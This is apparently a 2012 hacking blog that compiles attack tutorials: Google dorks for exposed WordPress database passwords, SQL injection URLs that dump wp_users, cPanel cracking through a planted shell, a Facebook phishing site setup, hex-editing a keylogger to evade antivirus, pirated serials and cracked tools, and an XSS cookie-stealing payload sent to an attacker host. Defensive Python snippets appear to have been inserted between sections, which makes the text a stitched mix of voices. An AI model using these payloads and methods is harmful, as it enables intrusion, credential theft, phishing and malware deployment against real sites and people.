blogger

Friday, August 10, 2012

Get Wordpress MySQL Database by Google Dork


This is a flaw on some WordPress websites that lets hackers obtain the website's MySQL database credentials remotely. You should already know about the MySQL database settings in WordPress (the wp-config.php file).

Dork:
allinurl:wp-config.txt
Go to Google.com and enter this dork: allinurl:wp-config.txt
The results give you MySQL database settings that look like this:



<?php
// ** MySQL settings ** //
define('DB_NAME', 'dbpakde');    // The name of the database
define('DB_USER', 'pakde');     // Your MySQL username
define('DB_PASSWORD', 'tot111'); // ...and password
define('DB_HOST', 'localhost');    // 99% chance you won't need to change this value

Live Demo : http://pakde.com/wp-config.txt
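As an added defender-side illustration (not part of the original post): a small Python audit that walks a document root for stray copies of wp-config (the wp-config.txt named above, plus assumed common backup suffixes) and reports which of the define()d MySQL settings each copy would expose as plain text. The sample config and the temporary document root are constructed here; the values are placeholders.

```python
import os
import re
import tempfile

# Matches the define('KEY', 'value') lines a wp-config file uses for its MySQL settings.
DEFINE_RE = re.compile(r"""define\(\s*['"](\w+)['"]\s*,\s*['"]([^'"]*)['"]\s*\)""")
SECRET_KEYS = ("DB_NAME", "DB_USER", "DB_PASSWORD", "DB_HOST")

# File names a web server would hand out verbatim instead of executing as PHP.
# wp-config.txt is the case documented above; the other suffixes are an assumption
# about common backup names left behind by editors and copy operations.
STRAY_COPY_RE = re.compile(
    r"^wp-config(?:\.php)?\.(?:txt|bak|old|orig|save)$|^wp-config\.php~$",
    re.IGNORECASE,
)


def parse_wp_config(text):
    """Return the define()d settings found in wp-config text as a dict."""
    return {key: value for key, value in DEFINE_RE.findall(text)}


def audit_docroot(docroot):
    """Walk a document root and list stray wp-config copies with the secrets they leak.

    Returns a sorted list of (path relative to docroot, [exposed setting names]).
    """
    findings = []
    for dirpath, _dirs, files in os.walk(docroot):
        for name in files:
            if not STRAY_COPY_RE.match(name):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                settings = parse_wp_config(fh.read())
            leaked = [key for key in SECRET_KEYS if key in settings]
            findings.append((os.path.relpath(path, docroot), leaked))
    return sorted(findings)


# Constructed sample in the wp-config format shown above; values are placeholders.
SAMPLE_CONFIG = """<?php
// ** MySQL settings ** //
define('DB_NAME', 'example_db');    // The name of the database
define('DB_USER', 'example_user');     // Your MySQL username
define('DB_PASSWORD', 'example-password'); // ...and password
define('DB_HOST', 'localhost');    // 99% chance you won't need to change this value
"""


def build_sample_docroot():
    """Create a throwaway document root holding the live config and a stray .txt copy."""
    root = tempfile.mkdtemp(prefix="docroot-")
    with open(os.path.join(root, "wp-config.php"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_CONFIG)  # executed by PHP, so its contents are never served
    with open(os.path.join(root, "wp-config.txt"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_CONFIG)  # served verbatim: this is the exposure
    os.makedirs(os.path.join(root, "wp-content"))
    return root


if __name__ == "__main__":
    for rel_path, leaked in audit_docroot(build_sample_docroot()):
        print(f"{rel_path}: exposes {', '.join(leaked)}")
```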

Mr.Dark Soul's Wordpress Blog Hacker


This is a WordPress hacking program named Mr.Dark Soul Wordpress Blog Hacker. It is a special tool for newbies who want to hack WP blogs. The screenshots are enough to teach you how to use Mr.Dark Soul Wordpress Blog Hacker.





Another Easy Method of Wordpress Blog Hacking (Wordpress Easy Comment)

New tutorial on WordPress blog hacking. Let's start...
Open Google.com and enter this dork:
inurl:"fbconnect_action=myhome"
You will find many sites. Select the site you are comfortable with.

The website URL will look like this: http://www.site.com/?fbconnect_action=myhome&userid=
Now replace
?fbconnect_action=myhome&userid=
with this:
?fbconnect_action=myhome&amp;fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pa ​ss)z0mbyak,7,8,9,10,11,12+from+wp_users-- 

So the URL changes from
www.site.com/?fbconnect_action=myhome&userid=
to this:
www.site.com/?fbconnect_action=myhome&amp;fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pa ​ss)z0mbyak,7,8,9,10,11,12+from+wp_users--
Now you have the username and password.

The password is encrypted with WordPress MD5 (blowfish). You need to decode it; download and run this software to decode this type of password.
Then find the administrator panel. Normally it is at
www.victimsite.com/wp-admin

or
www.victimsite.com/wp-login.php


Last step: type the decrypted username and password and log in to the website :)

wordpress SQL Injection Hacks

wordpress SQL Injection Hacks : Another Special Post :-) 

There are millions of sites hosted on WordPress, and I already posted some tutorials on WordPress hacking (you can check them here), so here is a new tutorial on WordPress hacking with SQL injection. Let's see.


Click here to check the list of WordPress SQL injections

How to use it?
1. Take an injection from the list. For example, the first entries of the list are "wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--" and index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/*
2. Turn it into a Google dork. To make the dork, use "inurl:<the injection's PHP file or directory>"; for the first injection the dork is "inurl:wp-content/plugins/st_newsletter/stnl_iframe.php".
3. Go to Google.com, type your modified dork and look at the search results. For this dork a result looks like http://siite.com/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=
4. Remove the words after iframe.php and put your SQL injection there. The URL becomes http://siite.com/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--
5. You will get the username and MD5-coded password. Crack the password using MD5 decoding tools and log in at http://site.com/wp-login.php
Note: the process is the same for all injections. Comment below if you have any doubt.
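An added example, not from the original post, serving both this section and the fbconnect one above: the query pattern behind these payloads beside its hardened form, plus a coarse access-log check for the UNION payloads quoted on this page. The tables and rows are constructed in an in-memory SQLite database (the hash value is a placeholder) and the table names are assumed from the payloads.

```python
import re
import sqlite3
from urllib.parse import unquote_plus, urlsplit

# Constructed stand-in for the tables the payloads above target; the hash is a placeholder.
SCHEMA = """
CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT, user_email TEXT);
CREATE TABLE stnl_newsletters (id INTEGER PRIMARY KEY, subject TEXT);
INSERT INTO wp_users VALUES (1, 'admin', 'PLACEHOLDER-HASH', 'admin@example.test');
INSERT INTO stnl_newsletters VALUES (1, 'Welcome issue');
INSERT INTO stnl_newsletters VALUES (2, 'Second issue');
"""


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(conn, newsletter):
    """The pattern behind the payloads: the request parameter is pasted into the SQL text,
    so a value such as '-9999 UNION SELECT ...' changes the structure of the query."""
    sql = "SELECT id, subject FROM stnl_newsletters WHERE id = " + newsletter
    return conn.execute(sql).fetchall()


ID_RE = re.compile(r"[0-9]{1,10}")


def safe_lookup(conn, newsletter):
    """Hardened form: validate the id strictly, then bind it with a placeholder so the
    database never parses user input as SQL."""
    if not ID_RE.fullmatch(newsletter):
        raise ValueError("newsletter id must be a decimal integer")
    sql = "SELECT id, subject FROM stnl_newsletters WHERE id = ?"
    return conn.execute(sql, (int(newsletter),)).fetchall()


def rejects(conn, newsletter):
    """True if the hardened lookup refuses the value."""
    try:
        safe_lookup(conn, newsletter)
    except ValueError:
        return True
    return False


# Detection side: the payloads quoted above all carry UNION SELECT or read wp_users.
SQLI_RE = re.compile(r"union\s+(?:all\s+)?select|from\s+wp_users", re.IGNORECASE)


def looks_like_sqli(url):
    """Coarse check for an access-log URL: decode '+' and %XX, then look for the markers."""
    query = unquote_plus(urlsplit(url).query)
    return bool(SQLI_RE.search(query))


if __name__ == "__main__":
    db = connect()
    print("vulnerable:", vulnerable_lookup(db, "-9999 UNION SELECT user_login, user_pass FROM wp_users--"))
    print("hardened rejects it:", rejects(db, "-9999 UNION SELECT user_login, user_pass FROM wp_users--"))
    print("hardened normal lookup:", safe_lookup(db, "2"))
```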

Cpanel Hacking/Cracking Tutorial


Today we will learn cPanel cracking or hacking, i.e. obtaining the password for the service on port 2082 of a website. First of all we need a cPanel cracking shell on the server, because we are going to crack the cPanel accounts of websites hosted on the shelled server.
So let's start. I am using the cpanel.php shell [download it here] for cracking :) We need two things for cracking: first, the usernames of the websites hosted on the server; second, a good password dictionary [get a password list here].

So, in the first step:
 grab the usernames of the websites using the command ls /var/mail
 or use the "Grab the usernames from /etc/passwd" option in the shell,
 then press the Go button.
  We have done our part.
  Let's wait and watch: if we supplied good passwords, the shell will show the message
   " [~]# cracking success with username "xyz" with password "xyz"   "
  otherwise it will show
   "[~] Please put some good passwords to crack username "xyz" :( "

  So the chances of success depend on the password list we use in the cracking process.
[GUEST POST]

BSQL Hacker : automated SQL Injection Framework Tool

BSQL Hacker is an automated SQL injection framework/tool designed to exploit SQL injection vulnerabilities in virtually any database. It is easy to use for beginners and provides a great amount of customisation and automation support for experienced users. It features a Metasploit-like exploit repository for sharing and updating SQL injection exploits.
BSQL Hacker is aimed at experienced users as well as beginners who want to automate SQL injections (especially blind SQL injections).

Videos
A new version is out; it is mostly bug fixes.

Key Features

  • Easy Mode
    • SQL Injection Wizard
    • Automated Attack Support (database dump)
      • ORACLE
      • MSSQL
      • MySQL (experimental)
  • General
    • Fast and Multithreaded
    • Support for 4 different SQL injection types
      • Blind SQL Injection
      • Time Based Blind SQL Injection
      • Deep Blind (based on advanced time delays) SQL Injection
      • Error Based SQL Injection
    • Can automate most of the new SQL injection methods that rely on blind SQL injection
    • RegEx Signature support
    • Console and GUI Support
    • Load / Save Support
    • Token / Nonce / ViewState etc. Support
    • Session Sharing Support
    • Advanced Configuration Support
    • Automated Attack mode: automatically extracts the whole database schema and data
  • Update / Exploit Repository Features
    • Metasploit-like exploit repository support
    • Allows saving and sharing SQL injection exploits
    • Supports auto-update
    • Custom GUI support for exploits (cookie input, URL input etc.)
  • GUI Features
    • Load and Save
    • Template and Attack File Support (users can save sessions and share them; some sections like username, password or cookie in the templates can be shown to the user in a GUI)
    • Visually view true and false responses as well as the full HTML response, including time and stats
  • Connection Related
    • Proxy Support (Authenticated Proxy Support)
    • NTLM, Basic Auth Support; use default credentials of current user/application
    • SSL (also invalid certificates) Support
    • Custom Header Support
  • Injection Points (only one of them or a combination)
    • Query String
    • Post
    • HTTP Headers
    • Cookies
  • Other
    • Post Injection data can be stored in a separate file
    • XML Output (not stable)
    • CSRF protection support (one-time session tokens, ASP.NET ViewState or similar can be used for separate login sessions, bypassing proxy pages etc.)

Hacking Facebook account password remotely using Keyloggers and RAT's
Best method for advanced hackers and my second favourite too. Its popularity is only a little lower than phishing, because it requires you to download a hacking tool, create your keylogger and send it to the victim, which is a lengthy process and also insecure, since you do not know whether the keylogger you download itself contains spyware or simply has a keylogger attached to it. Keylogging becomes much easier if you have physical access to the victim's computer, because the only thing you have to do is install a keylogger and point it at your destination so that it sends all recorded keystrokes there. What a keylogger does is record keystrokes into a log file; you can then use these logs to get the required Facebook password and thus hack the Facebook account.



MAKING FACEBOOK PHISHING SITE TUTORIAL



In my previous article I taught you how to make a phishing site (the article is here). Now in this article I am going to teach you how to set up the phishing site, which is a more difficult task than making it.

Step 1: The first step in making the site is to register an account at http://www.000webhost.com/order.php (if you already have an account, you can skip the first 2 steps).



Step 2: Now go to the email account you gave and confirm your account with the confirmation link.

Step 3: Now download this FILE.

Step 4: Now Goto http://members.000webhost.com/ and Log into your account.



Step 5: Now that you are logged into your account, click on Go to Cpanel in front of the domain you registered, then go to File Manager under Files and log into it.

Step 6: Now click on public_html.



Step 7: Now click on the Upload button and, under Archives, choose the file you downloaded to be uploaded.

Step 8: Now anyone who visits your site will be taken to the fake Facebook login page. After they enter their username and password, they will be taken to another page that shows them an error, so there is less chance that it will be detected.


NOTE::: To access the input data (usernames and passwords), go to the following address:

http://www.yoursitesadress.p4o.net/lol.html

If I am not clear in any point Please ask me in comments below.


The input data (email and password) will look like the following:
UPDATE:
Now, if you have successfully made the phishing page (site), you must know that on Facebook you cannot post it, mail it or send it in chat, e.g. www.yoursite.p4o.net. This is because Facebook does not allow the T35.com sites. The solution to this problem is to use http://www.dot.tk for URL hiding.
All you have to do is go to http://www.dot.tk, enter your phisher's address on the main page and get a domain for it. For www.myphisher.p4o.net you get www.myphisher.tk, and Facebook will allow you to post it.

PyLoris 3.2

What is so special about PyLoris?

One common method of performing a denial of service attack is called flooding: round up a large number of computers and tell them all to send or request a large amount of data from a server simultaneously. The purpose of these requests is not to gather large amounts of information; the intent is merely to overwhelm the capabilities of the server. In a situation like this, a server could fail because of the bandwidth restrictions of the internet service provider, the memory limitations of the server, the lack of hard drive space to store the data being sent, or the inability of the CPU to process the data fast enough. The common thread between these four issues is that they are finite resources that have been given to the server. PyLoris is different from this form of attack because it does not prey on any physical resource; instead, it overwhelms an artificial resource: connections.
In order to prevent the aforementioned forms of attack, applications limit their own utilization of system resources. If a process is going to use too much CPU, hard disk space, or memory, it will slow down and throttle requests, thereby ensuring the server's stability. Unfortunately, a number of web servers invent another form of resource, total connection count, with the idea that the connection count is linearly related to the utilization of other resources. This assumption is invalid; in the case of PyLoris, connections are relatively cheap in terms of CPU, memory, and network utilization. The upshot is that web servers imposing restrictions on the total number of connections will reject connections well before they hit their physical resources' limits. Essentially, developers have invented an artificial resource that causes a bottleneck far before any other physical limitation would.

What are the methods for mitigating this form of attack?

The typical responses to this attack come in various forms, but usually fall into one of the following:
  1. Keeping a tally of the number of connections made by a client. This counter would be incremented each time a connection is made, and decremented once every specified time interval. Any client over a certain number would be flagged as an alert, while any client over a larger limit would be automatically banned for a specified time.
    • A high number of requests in a short amount of time from a single client would not be able to bring down your server
    • Large companies or clusters behind NAT would set off a DoS trigger
    • Doesn't protect against an attack like PyLoris + TOR
  2. Keeping track of the number of concurrent connections. A counter would be kept for each client, incremented on connect, and decremented on disconnect. Clients over a certain number would be flagged, while clients over a larger number would be automatically banned for a specified time.
    • A high number of concurrent connections from a single client would not be able to bring down your server
    • Large companies or clusters behind NAT would set off a DoS trigger
    • Doesn't protect against an attack like PyLoris + TOR
  3. Connection serialization. Web browsers have a configurable option for the number of connections to make per server. Servers could incorporate a similar option: if the server is set to a maximum of 8 concurrent requests per client and a client makes 10, the server accepts all 10 requests, starts to fulfil the first 8, and deals with the extra 2 only after 2 connections have completed.
    • Protects against an attack like PyLoris
    • Large companies or clusters behind NAT would still be able to use the service
    • Large companies or clusters behind NAT would be throttled
    • Abusers are not banned
    • Doesn't protect against an attack like PyLoris + TOR
  4. Put the web server behind another device that collects full requests and passes them on only when they are complete.
    • Protects against an attack like PyLoris + TOR
    • Large companies or clusters behind NAT would still be able to use the service
    • Abusers are not banned
    • Cost is more than the average website owner has to spend
    • Introducing more hardware could introduce more vulnerabilities
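An added example (not from the PyLoris project) implementing mitigation methods 1 and 2 above as one per-client policy with flag and ban thresholds, driven by a caller-supplied clock so it can be simulated. The threshold values and the two simulated clients are assumptions; the NAT and TOR caveats from the list are noted in the comments.

```python
from dataclasses import dataclass


@dataclass
class ClientState:
    tally: int = 0            # method 1: connections made, decremented once per interval
    concurrent: int = 0       # method 2: connections open right now
    last_decay: float = 0.0   # when the tally was last decremented
    banned_until: float = 0.0


class ConnectionPolicy:
    """Flag/ban a client on either its connection tally or its concurrent connections.

    Both counters key on the client address, so many users behind one NAT share one
    budget (the false-positive caveat above), and a client that rotates exit nodes,
    as PyLoris + TOR does, is never seen as one client at all.
    All times are seconds supplied by the caller, which keeps the logic testable.
    """

    def __init__(self, flag_tally=10, ban_tally=30, decay_interval=1.0,
                 flag_concurrent=8, ban_concurrent=50, ban_seconds=60.0):
        self.flag_tally, self.ban_tally = flag_tally, ban_tally
        self.decay_interval = decay_interval
        self.flag_concurrent, self.ban_concurrent = flag_concurrent, ban_concurrent
        self.ban_seconds = ban_seconds
        self.clients = {}
        self.alerts = []  # (client, time, "flag" | "ban") for an analyst to review

    def _state(self, client, now):
        st = self.clients.get(client)
        if st is None:
            st = self.clients[client] = ClientState(last_decay=now)
        # Decrement the tally once for every full interval that has elapsed.
        intervals = int((now - st.last_decay) // self.decay_interval)
        if intervals > 0:
            st.tally = max(0, st.tally - intervals)
            st.last_decay += intervals * self.decay_interval
        return st

    def on_connect(self, client, now):
        """Return "ok", "flagged" or "banned" for a new connection from client."""
        st = self._state(client, now)
        if now < st.banned_until:
            return "banned"
        st.tally += 1
        st.concurrent += 1
        if st.tally >= self.ban_tally or st.concurrent >= self.ban_concurrent:
            st.banned_until = now + self.ban_seconds
            st.concurrent -= 1  # the connection is refused, so it is not open
            self.alerts.append((client, now, "ban"))
            return "banned"
        if st.tally >= self.flag_tally or st.concurrent >= self.flag_concurrent:
            self.alerts.append((client, now, "flag"))
            return "flagged"
        return "ok"

    def on_disconnect(self, client, now):
        st = self._state(client, now)
        st.concurrent = max(0, st.concurrent - 1)


def simulate_slow_client(policy, client="192.0.2.10", opened=12):
    """Slowloris-style client: connections held open at once, none of them closed.
    The tally stays low, so only the concurrent-connection count (method 2) reacts."""
    return [policy.on_connect(client, 0.0) for _ in range(opened)]


def simulate_burst_client(policy, client="192.0.2.11", attempts=30):
    """Burst client: short-lived connections in rapid succession.
    Concurrency never exceeds one, so only the tally (method 1) reacts."""
    results = []
    for i in range(attempts):
        now = i * 0.01
        results.append(policy.on_connect(client, now))
        policy.on_disconnect(client, now)
    return results


if __name__ == "__main__":
    print("slow client :", simulate_slow_client(ConnectionPolicy()))
    print("burst client:", simulate_burst_client(ConnectionPolicy()))
```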

How could one remove these artificial limitations?

The unfortunate reality is that none of the aforementioned mitigating tactics actually address the problem of artificial limitations. In order to do this, developers will need to work on the following areas:
  1. Remove the artificial limitation: developers should impose restrictions on the actual resource they are trying to protect, not arbitrarily create an unrelated one.
  2. Reduce the memory and CPU footprint of inactive or incomplete connections: Windows limits TCP/IP connections by the amount of memory they use. A default installation of Linux sets the maximum number of file descriptors at 205199, orders of magnitude higher than the maximum number of connections the default installations of certain web servers will allow. If the resource utilization of a connection is on par with what the underlying operating system uses, then the capabilities of these web servers will once again be restricted by the physical resources of the machine.
  3. Limit applications based on physical resources: a misconfigured web server with connections set too high can cause the entire operating system to crash. If developers were to restrict their applications' resources, many attacks would have a much smaller impact.

Why should I use PyLoris instead of Slowloris?

While the basic forms of PyLoris and Slowloris are functionally similar, they were developed with two entirely different motives in mind. Slowloris, developed by RSnake, was designed to showcase a particularly devastating form of denial of service attack. PyLoris, on the other hand, is designed to be a fully functional performance testing tool. With PyLoris you can:
  • Test the capability of your web server to handle incoming connections
  • Discover how well your firewall policies work against DoS and DDoS attacks
  • Assess how your load balancer or content service switch handles high loads
  • Test the web servers of your embedded devices for flaws
  • Harness SOCKS proxies and TOR to audit your network infrastructure and test vulnerabilities from multiple routes
  • Perform the Slowloris attack against non-HTTP protocols
  • Build and distribute attack scripts with ScriptLoris and libloris


Ardamax Keylogger 4.0 (latest) Free Serial Key and FUD

Ardamax Keylogger is an invisible computer monitoring application. We need monitoring software to record PC activity when we are away. You can also use it if you want to log the passwords when your friends log in through your computer. So today I have decided to give away the serial of Ardamax Keylogger 3.9.1, worth USD 44.95.



List of posts in the Ardamax series:

1. Get Ardamax Keylogger 3.9/3.9.1 Serial (we are here)

Ardamax Keylogger features:
The features below are taken from the official site.
  • Email log delivery 
  • FTP delivery 
  • Network delivery 
  • Clipboard logging 
  • Invisible mode 
  • Visual surveillance 
  • Chat monitoring
  • Security
  • Application monitoring 
  • Time/Date tracking
  • Powerful Log Viewer 
  • Small size 
Ardamax Keylogger 3.9.1/3.9 Free Serial Key

You don't need to buy it.

Install Ardamax 4.0.
  1. Right-click the Ardamax icon in your system tray and click Register.
  2. Enter the name and serial key provided in the downloaded file.
  3. Enjoy!!

Hex Editing Ardamax Keylogger to Make it FUD

Make Ardamax Keylogger FUD. I had to choose this option because the crypters were no longer FUD. People who don't have patience may not want to continue, because this post is rather lengthy. It took me 4-5 hours to make it FUD though! So let's begin.
You will need the following things:
1. File splitter
2. Hex editing software
3. Antivirus
4. And of course the keylogger (in my case I am using Ardamax)
To make it easy for you all I have added the screenshots too.

1. First split the keylogger into 4 parts. But how are you going to do that? Divide the bytes by 4, as shown in the screenshot.
2. The files will be split into the desired location.
3. Scan them and see which one is infected. For me it was install.exe.1.
4. Split this file too and scan the pieces the same way until you get no detection.
5. For me this was the last file that was detected, so I will now open the detected file with the hex editor.
6. Antiviruses use signatures to detect keyloggers and other malware. So here is the trick: we have to edit the signature to make it different, and the antivirus will no longer be able to detect it. It is not easy to find the signature and edit it, so you have to use trial and error until you get it right. However, this is not enough: editing may interfere with the remote file and make it stop working. In my case I changed the thing shown in the screenshot.
7. Save the file. Then scan it...

I made it FUD. Now click on Create_install to compile the file. You are done. If you are successful then comment with your file links. Hope you like my tutorial.


Project Neptune



Upload Date: 10/5/2011
Last Update Date: 10/11/2011 (Curing update.)
Latest Version: v1.78
Project Neptune (1.7 MiB - 32165 downloads)

Many people may consider Project Neptune to be malicious or unethical, but it is absolutely not intended to be.  Still, there are those users that may use it in such ways, disregarding moral integrity.  Because of this, we, the staff of Project Neptune, would like to make this clear: We are absolutely not responsible for any of your actions involving this program.  You need to have permission from the owner of the computer you’re installing Project Neptune on.  Otherwise, you are breaching another person’s privacy, and you’re most likely breaching the laws of your country.
Many anti-viruses will detect Dissembler Lib.dll as a virus, categorized under a 'hacking tool' genre. This file will not harm your computer in any way, although we've made sure to make it unneeded to use Project Neptune. Without it, however, you will not be able to change your file output's icon, company name, copyright, etc.



Havij v1.15 Advanced SQL Injection (Cracked)


Version 1.15 2011/06/08

-Webknight WAF bypass added.
-Bypassing mod_security made better
-Unicode support added
-A new method for tables/columns extraction in mssql
-Continuing previous tables/columns extraction made available
-Custom replacement added to the settings
-Default injection value added to the settings (when using %Inject_Here%)
-Table and column prefix added for blind injections
-Custom table and column list added.
-Custom time out added.
-A new md5 cracker site added
-bugfix: a bug relating to the SELECT command
-bugfix: finding string column
-bugfix: getting multi column data in mssql
-bugfix: finding mysql column count
-bugfix: wrong syntax in injection string type in MsAccess
-bugfix: false positive results were removed
-bugfix: data extraction in url-encoded pages
-bugfix: loading saved projects
-bugfix: some errors in data extraction in mssql fixed.
-bugfix: a bug in MsAccess when guessing tables and columns
-bugfix: a bug when using proxy
-bugfix: enabling remote desktop bug in windows server 2008 (thanks to www.thepiratesoft.org)
-bugfix: false positive in finding columns count
-bugfix: when mssql error based method failed
-bugfix: a bug in saving data
-bugfix: Oracle and PostgreSQL detection


[How to] Cross Site Scripting and cookie stealing
## Title: What is the Cross Site Scripting attack and how to use the cookie stealing attack.
## Written by: Hacking-tool
## for more info comment

In the film we see the usual guy with dark glasses and leather jacket, hacking at the keyboard, in less than a minute he has the access codes of a login system. Science fiction? No, all true!

There are various ways to attack a website. I list a few:
-XSS stands for cross-site scripting
-SQL-Injection, Injection of SQL commands in a site
-Blind Sql-Injection
-RFI or Remote File Inclusion
-LFI, Local File Inclusion
-DOS, short for Denial of Service
-DDoS, Distributed Denial of Service
-Format-string attacks

What is an XSS:
Unlike SQL injection and other attacks on web applications, this attack affects both dynamic sites and static ones. The attack can be carried out on any site that makes use of JavaScript, VBScript, ActiveX, HTML or Flash. For those unfamiliar with these languages, just think of them as languages and applications that run directly in your web browser (Internet Explorer, Netscape, Mozilla Firefox, Google Chrome, etc.). So it is a vulnerability that affects websites with weak control over their variables. XSS lets you insert code at the browser level (often JavaScript code, but also PHP, HTML, etc.) in order to modify the source code of the web page. It is therefore possible whenever a website takes input data on which it performs operations (such as the site's internal search engine, but not only). This information is usually sent to the site via the URL or with an HTTP POST. On insecure sites these data are displayed exactly as the users posted them. In this way anyone can get hold of sensitive data, such as cookies.
To do this we only need to redirect our victim to a web page with the appropriately modified variables.
A very important thing to say is that there are two types of XSS:

Stored: in which an attacker is able to permanently modify the content of a web page, for example by entering a suitably prepared comment on a blog post.
Reflected: in which it is possible to craft a URL that, through the vulnerable site, alters the content of the page non-permanently and only for HTTP requests that use such specially forged URLs.
This vulnerability is due to errors by programmers, who often completely neglect the validation of the input passed with HTTP requests.

XSS exploits parameters that are declared or handled badly:
Take for example this PHP page:


Code:
<?php // the variable under examination is c
$var = $_GET['c'];
echo $var;
?>

I said precisely that 'c' is a variable that is read and printed on the page.
At URL level, if we give the value 'hola' to this variable we get:

Code:
http://www.site.it/test.php?c=hola


In the rendered page we then find the text: hola
From this we understand that whatever value we give to c will be printed on the page, and as long as those are words and numbers I would say everything is fine. But what if we inject malicious JavaScript code? Just think what would happen.
When an attacker runs his code in the browser, the code runs in the security context (or zone) of the hosting website. With this level of privilege, the code has the ability to read, edit and transmit sensitive data accessible from the browser.

A user vulnerable to XSS could have his account stolen (by stealing cookies), his browser may be redirected elsewhere, or his data may be defrauded through the website he is visiting. Essentially, an XSS attack undermines the "trust" between a user and the website in question.

There are two types of cross-site scripting attacks: persistent attacks and non-persistent attacks.

Non-persistent attacks require that a user visits a specially modified link containing malicious code. Once the link is accessed, the malicious code runs inside the browser.
Persistent attacks have malicious code in web pages that are hosted online for a period of time.
Favourite targets of malicious users are posts in web mail, web chat, etc. The user, unaware of everything, does not have to click on a particular link but simply visits the web page containing the malicious message.

Structure of an XSS:
I would say that one thing is now certain: you must have basic knowledge of HTML, JS, etc. to exploit this type of attack.

A typical, basic attack known by everyone is the string:
Code:

<script>alert("XSS")</script>

Let's analyze it:

<script>: opens the JavaScript code with its various commands;

alert: brings up a message alert (for those who don't know, it is a simple text box);

("XSS"): is the string displayed inside the alert; it does not have to be text, it can also be a number (in which case the "" are not necessary);

</script>: closes the JavaScript code.

Now we analyze this string:

Code:
<script>alert(document.cookie)</script>
 
<script>: opens the JavaScript code with its various commands;

alert: pops up an alert;

(document.cookie): instead of showing a string of text, displays an alert with your cookie.

Filters:
Webmasters adopt defences that are sometimes very easy to get past and sometimes more complicated, and this is where the fun starts, because it takes the imagination of each of us to bring up the much desired alert!
These defences are called "filters": code that prohibits the use of special characters. Someone less experienced may consider the problem completely solved, but it is not so! Take for example this filter:

Code:
<?php
$var = $_GET['c'];
$var = str_replace("<script>", "script", $var); // only the exact lowercase tag is rewritten
echo $var;
?>

This will block the use of <script> and </script>, but we do not necessarily have to use these.
There are various types of filters, one of which is the addslashes filter, which escapes quote characters with a backslash (as the code below shows), making our code useless. This is the structure of the filter:

Code:
<?php
// Illustrative only: PHP already ships a built-in addslashes(), so a user-defined
// function with this name would clash with it.
function addslashes ($var){
$var = str_replace ('"', '\"', $var);
$var = str_replace ("'", "\'", $var);
return $var;
}
?>

That would be inserted into a php page:

Code:
<?php
$var = $_GET['var'];
$var = addslashes($var);
echo $var;
?>

Now you may ask: how do we get around this, since we cannot put in any quote? A simple method would be to convert our code to ASCII.
A great site for other fantastic and ingenious XSS is: http://www.ha.ckers.org/xss.html
So far we have seen a series of commands, all harmless at first, but imagine if instead of an alert we redirected the web page to a cookie grabber. Soon I will also explain what a cookie is, how to use it and what the cookie grabbing technique is. Continue...
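An added example, not part of the original post: the str_replace filter from above reimplemented in Python beside proper output encoding (html.escape, the counterpart of PHP's htmlspecialchars with ENT_QUOTES), run over the payloads quoted in this post. The cookie-header helper shows the HttpOnly flag that keeps document.cookie from reading a session cookie even when an injection does get through; the cookie name and value are placeholders.

```python
import html


def blacklist_filter(value):
    """The page's str_replace filter: only the exact lowercase opening tag is rewritten."""
    return value.replace("<script>", "script")


def encode_output(value):
    """Output encoding: every character that can open a tag or close an attribute is
    turned into an entity, so the browser renders the input as text. Equivalent to
    PHP htmlspecialchars($value, ENT_QUOTES, 'UTF-8')."""
    return html.escape(value, quote=True)


def contains_markup(value):
    """True if the string could still open a tag or break out of a quoted attribute."""
    return any(ch in value for ch in "<>\"'")


def httponly_cookie_header(name, value):
    """Session cookie flags: HttpOnly hides the cookie from document.cookie, Secure keeps
    it off plain HTTP, SameSite=Lax keeps it off most cross-site requests."""
    return f"Set-Cookie: {name}={value}; Path=/; HttpOnly; Secure; SameSite=Lax"


# The payloads quoted in this post, used only as test input for the two filters.
PAYLOADS = [
    '<script>alert("XSS")</script>',
    "<script>alert(document.cookie)</script>",
    "<SCRIPT> document.location='http://attackerhost.example/cgi-bin/cookiesteal.cgi?'"
    "+document.cookie </SCRIPT>",
]


def compare(payloads=PAYLOADS):
    """For each payload: (markup survives the blacklist?, markup survives encoding?)."""
    return [
        (contains_markup(blacklist_filter(p)), contains_markup(encode_output(p)))
        for p in payloads
    ]


if __name__ == "__main__":
    for payload, (after_blacklist, after_encoding) in zip(PAYLOADS, compare()):
        print(f"{payload[:40]!r:45} blacklist leaves markup: {after_blacklist}, "
              f"encoding leaves markup: {after_encoding}")
    print(httponly_cookie_header("PHPSESSID", "placeholder-session-id"))
```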

Persistent attacks:
Many websites have message boards, tagboards and so on where you can leave one or more messages. A registered user is usually identified by a session ID cookie, so he can leave a message and be identified. If we inject malicious JavaScript code as a message, for example, we could also compromise the cookie of whoever reads the message.
This is possible when the site/forum is vulnerable to XSS and we inject the command as a message visible to all:

Code:
<SCRIPT> document.location=‘http://attackerhost.example/cgi-bin/cookiesteal.cgi?’+document.cookie </SCRIPT>

What we have just shown is a typical example of a persistent attack.

Non-persistent attacks:
Some sites instead offer a customisable view; for example, when we log in to a site and receive a welcome message, some data may be displayed in the URL and thus be visible to everyone. In the URL we might read something like this:

Code:
http://site.example/index.php?sessionid=12345678&username=yourname

If a malicious user modifies the URL appropriately, inserting JS code capable of stealing cookies, he may take control of an account, obviously masking the code like this:

Code:
